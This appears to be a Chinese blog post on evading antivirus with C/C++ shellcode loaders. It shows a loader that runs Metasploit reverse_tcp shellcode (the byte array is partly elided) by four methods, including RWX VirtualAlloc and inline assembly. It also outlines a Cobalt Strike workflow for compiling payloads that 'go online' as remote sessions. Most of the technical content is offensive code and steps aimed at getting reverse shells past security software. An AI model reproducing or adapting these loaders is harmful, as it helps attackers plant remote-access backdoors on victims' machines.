C/C++免杀--原生态(GG)

看个热闹吧...

metasploit payload运行原理浅析(sockedi调用约定是什么)

lib/msf/core/payload/windows/reverse_tcp.rb:

metasploit-framework/lib/msf/core/payload/windows/reverse_tcp.rb at master · rapid7/metasploit-framework · GitHub

原生态:

MSF:

#include <Windows.h>
#include <stdio.h>
#include <string.h>

//#pragma comment(linker,"/subsystem:\"Windows\" /entry:\"mainCRTStartup\"") //windows控制台程序不出黑窗口


unsigned char buf[] = 
"\xfc\xe8\x8f\x00\x00\x00\x60\x31\xd2\x64\x8b\x52\x30\x8b"
.
.
.
.
\x29\xc6\x75\xc1\xc3\xbb\xf0\xb5\xa2\x56\x6a"
"\x00\x53\xff\xd5";





int main()

{
    
    //四种模式,随机选一种.(都GG)
	((void(WINAPI*)(void))&buf)();
	
	//char* Memory;
    //Memory = VirtualAlloc(NULL, sizeof(buf), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
    //memcpy(Memory, buf, sizeof(buf));
    //((void(*)())Memory)();

    //__asm {
    //lea eax,buf
    //call eax
    //}
	
	//__asm{
	//mov eax, offset shellcode
	//_emit 0xFF
	//_emit 0xE0
	//}

}

CS:

cs--创建监听器--生成c的payload--替换payload--编译执行--上线

什么原理?

shellcode生成

msf cs

利用C/C++编译shellcode形成exe上线

shellcode:免杀手段繁多--搞坏的可能性小--自定义更多选择

可执行文件:免杀手段单一--搞坏的可能性大



MSF 源码地址reverse_tcp.rb

源码shellcode上线逻辑

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

金灰

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值